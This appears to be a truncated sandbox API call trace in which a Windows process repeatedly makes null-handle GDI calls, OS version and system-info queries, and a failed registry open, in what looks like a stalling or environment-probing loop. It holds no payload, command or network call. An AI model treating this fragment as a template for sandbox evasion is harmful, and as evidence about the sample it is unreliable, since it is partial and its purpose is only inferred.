(hdc=0x0, h=0x0) returned 0x0 [0017.798] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.798] BeginPath (hdc=0x0) returned 0 [0017.798] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.798] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.798] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.798] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.798] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.798] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.798] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.798] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.798] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4104027d [0017.798] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4b040713 [0017.798] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d99 [0017.798] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d9a [0017.798] CombineRgn (hrgnDst=0x1040d99, hrgnSrc1=0x4104027d, hrgnSrc2=0x4b040713, iMode=1) returned 1 [0017.798] CombineRgn (hrgnDst=0x1040d9a, hrgnSrc1=0x4104027d, hrgnSrc2=0x4b040713, iMode=4) returned 2 [0017.798] CreateSolidBrush (color=0xff) returned 0x2100d98 [0017.798] CreateSolidBrush (color=0xff0000) returned 0x1100d9b [0017.798] DeleteObject (ho=0x1100d9b) returned 1 [0017.798] DeleteObject (ho=0x4b040713) returned 1 [0017.799] DeleteObject (ho=0x4104027d) returned 1 [0017.799] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.799] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.799] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.799] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.799] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.799] BeginPath (hdc=0x0) returned 0 [0017.799] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.799] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.799] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.799] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.799] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.799] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.799] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.799] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.799] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4c040713 [0017.799] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4204027d [0017.799] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d9c [0017.799] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d9d [0017.799] CombineRgn (hrgnDst=0x1040d9c, hrgnSrc1=0x4c040713, hrgnSrc2=0x4204027d, iMode=1) returned 1 [0017.799] CombineRgn (hrgnDst=0x1040d9d, hrgnSrc1=0x4c040713, hrgnSrc2=0x4204027d, iMode=4) returned 2 [0017.799] CreateSolidBrush (color=0xff) returned 0x2100d9b [0017.799] CreateSolidBrush (color=0xff0000) returned 0x1100d9e [0017.799] DeleteObject (ho=0x1100d9e) returned 1 [0017.799] DeleteObject (ho=0x4204027d) returned 1 [0017.799] DeleteObject (ho=0x4c040713) returned 1 [0017.799] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.799] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.800] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.800] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.800] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.800] BeginPath (hdc=0x0) returned 0 [0017.800] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.800] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.800] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.800] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.800] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.800] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.800] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.800] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.800] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4304027d [0017.800] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4d040713 [0017.800] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d9f [0017.800] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040da0 [0017.800] CombineRgn (hrgnDst=0x1040d9f, hrgnSrc1=0x4304027d, hrgnSrc2=0x4d040713, iMode=1) returned 1 [0017.800] CombineRgn (hrgnDst=0x1040da0, hrgnSrc1=0x4304027d, hrgnSrc2=0x4d040713, iMode=4) returned 2 [0017.800] CreateSolidBrush (color=0xff) returned 0x2100d9e [0017.800] CreateSolidBrush (color=0xff0000) returned 0x1100da1 [0017.800] DeleteObject (ho=0x1100da1) returned 1 [0017.800] DeleteObject (ho=0x4d040713) returned 1 [0017.800] DeleteObject (ho=0x4304027d) returned 1 [0017.800] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.800] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.800] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.801] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.801] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.801] BeginPath (hdc=0x0) returned 0 [0017.801] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.801] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.801] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.801] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.801] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.801] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.801] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.801] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.801] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4e040713 [0017.801] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4404027d [0017.801] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040da2 [0017.801] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040da3 [0017.801] CombineRgn (hrgnDst=0x1040da2, hrgnSrc1=0x4e040713, hrgnSrc2=0x4404027d, iMode=1) returned 1 [0017.801] CombineRgn (hrgnDst=0x1040da3, hrgnSrc1=0x4e040713, hrgnSrc2=0x4404027d, iMode=4) returned 2 [0017.801] CreateSolidBrush (color=0xff) returned 0x2100da1 [0017.801] CreateSolidBrush (color=0xff0000) returned 0x1100da4 [0017.801] DeleteObject (ho=0x1100da4) returned 1 [0017.801] DeleteObject (ho=0x4404027d) returned 1 [0017.801] DeleteObject (ho=0x4e040713) returned 1 [0017.801] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.801] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.801] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.801] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.801] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.801] BeginPath (hdc=0x0) returned 0 [0017.801] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.802] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.802] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.802] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.802] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.802] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.802] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.802] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.802] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4504027d [0017.802] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4f040713 [0017.802] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040da5 [0017.802] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040da6 [0017.802] CombineRgn (hrgnDst=0x1040da5, hrgnSrc1=0x4504027d, hrgnSrc2=0x4f040713, iMode=1) returned 1 [0017.802] CombineRgn (hrgnDst=0x1040da6, hrgnSrc1=0x4504027d, hrgnSrc2=0x4f040713, iMode=4) returned 2 [0017.802] CreateSolidBrush (color=0xff) returned 0x2100da4 [0017.802] CreateSolidBrush (color=0xff0000) returned 0x1100da7 [0017.802] DeleteObject (ho=0x1100da7) returned 1 [0017.802] DeleteObject (ho=0x4f040713) returned 1 [0017.802] DeleteObject (ho=0x4504027d) returned 1 [0017.802] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.802] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.802] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.802] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.802] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.802] BeginPath (hdc=0x0) returned 0 [0017.802] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.802] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.802] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.802] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.802] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.803] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.803] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.803] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.803] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x50040713 [0017.803] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4604027d [0017.803] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040da8 [0017.803] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040da9 [0017.803] CombineRgn (hrgnDst=0x1040da8, hrgnSrc1=0x50040713, hrgnSrc2=0x4604027d, iMode=1) returned 1 [0017.803] CombineRgn (hrgnDst=0x1040da9, hrgnSrc1=0x50040713, hrgnSrc2=0x4604027d, iMode=4) returned 2 [0017.803] CreateSolidBrush (color=0xff) returned 0x2100da7 [0017.803] CreateSolidBrush (color=0xff0000) returned 0x1100daa [0017.803] DeleteObject (ho=0x1100daa) returned 1 [0017.803] DeleteObject (ho=0x4604027d) returned 1 [0017.803] DeleteObject (ho=0x50040713) returned 1 [0017.803] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.803] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.803] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.803] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.803] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.803] BeginPath (hdc=0x0) returned 0 [0017.803] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.803] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.803] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.803] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.803] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.803] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.803] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.804] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.804] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4704027d [0017.804] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x51040713 [0017.804] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dab [0017.804] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dac [0017.804] CombineRgn (hrgnDst=0x1040dab, hrgnSrc1=0x4704027d, hrgnSrc2=0x51040713, iMode=1) returned 1 [0017.804] CombineRgn (hrgnDst=0x1040dac, hrgnSrc1=0x4704027d, hrgnSrc2=0x51040713, iMode=4) returned 2 [0017.804] CreateSolidBrush (color=0xff) returned 0x2100daa [0017.804] CreateSolidBrush (color=0xff0000) returned 0x1100dad [0017.804] DeleteObject (ho=0x1100dad) returned 1 [0017.804] DeleteObject (ho=0x51040713) returned 1 [0017.804] DeleteObject (ho=0x4704027d) returned 1 [0017.804] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.804] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.804] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.804] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.804] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.804] BeginPath (hdc=0x0) returned 0 [0017.804] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.804] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.804] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.804] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.804] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.804] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.804] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.804] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.805] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x52040713 [0017.805] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4804027d [0017.805] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dae [0017.805] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040daf [0017.805] CombineRgn (hrgnDst=0x1040dae, hrgnSrc1=0x52040713, hrgnSrc2=0x4804027d, iMode=1) returned 1 [0017.805] CombineRgn (hrgnDst=0x1040daf, hrgnSrc1=0x52040713, hrgnSrc2=0x4804027d, iMode=4) returned 2 [0017.805] CreateSolidBrush (color=0xff) returned 0x2100dad [0017.805] CreateSolidBrush (color=0xff0000) returned 0x1100db0 [0017.805] DeleteObject (ho=0x1100db0) returned 1 [0017.805] DeleteObject (ho=0x4804027d) returned 1 [0017.805] DeleteObject (ho=0x52040713) returned 1 [0017.805] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.805] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.805] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.805] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.805] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.805] BeginPath (hdc=0x0) returned 0 [0017.805] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.805] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.805] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.805] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.805] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.805] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.805] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.805] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.806] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4904027d [0017.806] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x53040713 [0017.806] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040db1 [0017.806] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040db2 [0017.806] CombineRgn (hrgnDst=0x1040db1, hrgnSrc1=0x4904027d, hrgnSrc2=0x53040713, iMode=1) returned 1 [0017.806] CombineRgn (hrgnDst=0x1040db2, hrgnSrc1=0x4904027d, hrgnSrc2=0x53040713, iMode=4) returned 2 [0017.806] CreateSolidBrush (color=0xff) returned 0x2100db0 [0017.806] CreateSolidBrush (color=0xff0000) returned 0x1100db3 [0017.806] DeleteObject (ho=0x1100db3) returned 1 [0017.806] DeleteObject (ho=0x53040713) returned 1 [0017.806] DeleteObject (ho=0x4904027d) returned 1 [0017.806] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.806] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.806] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.806] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.806] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.806] BeginPath (hdc=0x0) returned 0 [0017.806] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.806] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.806] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.806] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.806] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.806] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.806] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.806] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.806] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 